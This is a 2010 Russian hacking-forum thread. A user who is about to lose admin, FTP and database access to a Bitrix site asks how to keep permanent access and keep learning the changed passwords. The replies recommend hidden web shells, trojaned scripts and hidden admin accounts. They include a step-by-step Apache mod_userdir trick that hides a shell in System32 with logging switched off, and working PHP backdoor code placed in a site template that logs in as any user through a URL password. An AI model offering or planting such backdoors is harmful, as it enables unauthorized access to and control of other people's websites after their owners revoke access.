Вечный доступ к сайту. Вопрос

Discussion in 'Песочница' started by rainboww, 30 Apr 2010.

  1. rainboww

    rainboww New Member

    Joined:
    23 Oct 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Как получить вечный доступ к сайту если он у меня сейчас есть?

    CMS - Битрикс - есть доступ к админке /bitrix/admin

    Есть доступ к FTP

    Есть доступ к MySQL


    Скоро всего этого не будет, но хотелось чтоб как бы не меняли все это я всегда мог узнать текущие логины/пассы
     
  2. [Agent]

    [Agent] New Member

    Joined:
    17 Apr 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Ну как вариант - модернизировать скрипты в свою сторону, благо там надо от силы 8 строчек.
     
  3. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,183
    Likes Received:
    618
    Reputations:
    690
    залить шелл и спряттать или потроянить скрипты (плюсс зашифровай с куском скрипта) чтобы админ если удалит кусок то сам скрипт не работал...
     
    _________________________
    1 person likes this.
  4. _eXorcist_

    _eXorcist_ New Member

    Joined:
    24 Dec 2009
    Messages:
    69
    Likes Received:
    3
    Reputations:
    0
    попробуй добавить скрытого администратора на каком то из форумов читал про битрикс как это делается
     
  5. immortalist

    immortalist Member

    Joined:
    16 Jan 2010
    Messages:
    99
    Likes Received:
    64
    Reputations:
    37
    100% постоянный доступ получить нереально, только если угонять мыло, куда привязан хостинг. Сдохнет хостинг, перезальют скрипты, наступит конец света - хоть обзаливайся и обпрячься шеллов. Только если хостинг ломанешь и рута на всех его юзверей получишь. И то - в свете последних событий хостинги тоже могут попрощаться со своими дата-центрами etc...
     
  6. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Я под виндой делаю так:
    Лезу в httpd.conf
    настраиваю mod_userdir под папку "C:/WINDOWS/System32/framework/"
    Ложу шелл в C:/WINDOWS/System32/framework/microsoft_dll/shell.php
    юзаю http://target/~microsoft_dll/shell.php
    И пусть там админ хоть всю папку свою перетрёт, а мой шелл будет жить вечно, пока веб сервер не снесут
    От очень умных админов спасаюсь строчкой
    Include C:/WINDOWS/System32/apache.dll
    в httpd.conf
    в C:/WINDOWS/System32/apache.dll пишу конфиги mod_userdir
    Ну и конечно логи апача отключить нафик

    Но ТС наверняка говорит про линукс, такчто всем по***
     
    #6 Ponchik, 2 May 2010
    Last edited: 2 May 2010
    10 people like this.
  7. none222

    none222 Guest

    Reputations:
    0
    .................../>  フ.....................
         |  _  _|
         /`ミ _x 彡
         /      |
        /  ヽ   ノ
     / ̄|   | | |
     | ( ̄ヽ__ヽ_)_)
     \二つ
     
    #7 none222, 4 May 2010
    Last edited by a moderator: 6 Nov 2020
  8. Byte_

    Byte_ Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    143
    Likes Received:
    34
    Reputations:
    2
    rainboww, на самом деле всё гораздо проще. В битриксе есть замечательное api на этот случай
    Code:
    global $USER;
    $USER->Authorize(1);// авторизуем пользователя с id = 1
    
    фишка в том, что для авторизации пользователя в системе совершенно не обязательно знать его пароль. Только id =)

    я довольно часто дописываю в самом низу шаблона что-то вроде
    Code:
    if($_GET['pwd']=='myPassword'){
    global $USER;
    $USER->Authorize($_GET['uid']);
    }
    
    теперь что-бы стать админом сайта не на долго я просто делаю так http://url.ru/?pwd=myPassword&uid=1
     
Loading...